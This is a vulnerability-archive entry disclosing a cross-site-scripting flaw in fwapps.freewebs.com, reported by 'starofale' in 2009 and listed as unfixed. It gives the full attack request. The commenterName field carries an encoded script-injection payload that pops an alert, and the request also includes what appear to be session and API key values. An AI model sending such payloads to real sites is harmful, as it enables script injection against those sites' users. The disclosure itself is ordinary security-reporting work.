Security researcher starofale, has submitted on 19/04/2009 a cross-site-scripting (XSS) vulnerability affecting fwapps.freewebs.com, which at the time of submission ranked 704 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 19/04/2009 |
Date published: 07/09/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: starofale |
Domain: fwapps.freewebs.com |
Category: XSS |
Pagerank: 704 |
URL: http://fwapps.freewebs.com/s/app/comments/post?&fw_sig_width=624&fw_sig_premium_level=2&fw_sig=ca80e 0337a4e3f00e117e954fe962fa7&fw_sig_time=1240159076609&fw_sig_owner=39798521&fw_sig_session_key=50387 1026eaea129e12ad4c455fd5a924f2c8e784574ea5eb7184e89b1ee2694%2D39798521&fw_sig_permissions=none&fw_si g_api_key=ynwfbf8k2f7dn9jssqvcguxv&fw_sig_site=39798521&fw_sig_is_admin=0 |
POST: appId=625&streamId=1178300&name=guestbook_comments_39798521&namespace=default&linkbackURL=http%3A%2F %2Fcharlotteteaparty.webs.com%2Fapps%2Fguestbook%2F&thumbnailURL=&returnURL=http%3A%2F%2Fcharlottete aparty.webs.com%2Fapps%2Fguestbook%2F&commenterName=%26%23x27%3B%26%23x29%3B%26%23x22%3B%26%23x3E%3B %26%23x3C%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3E%3B%26% 23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x22%3B%26%23x58%3B%26%23x5 3%3B%26%23x53%3B%26%23x22%3B%26%23x29%3B%26%23x3C%3B%26%23x2F%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B %26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3E%3B&commenterEmail=bob%40job.com&body=xss+vunerable+%28 might+want+to+fix+this%29&submit.x=67&submit.y=21&submit=Submit |
Click here to view the mirror
|
|
|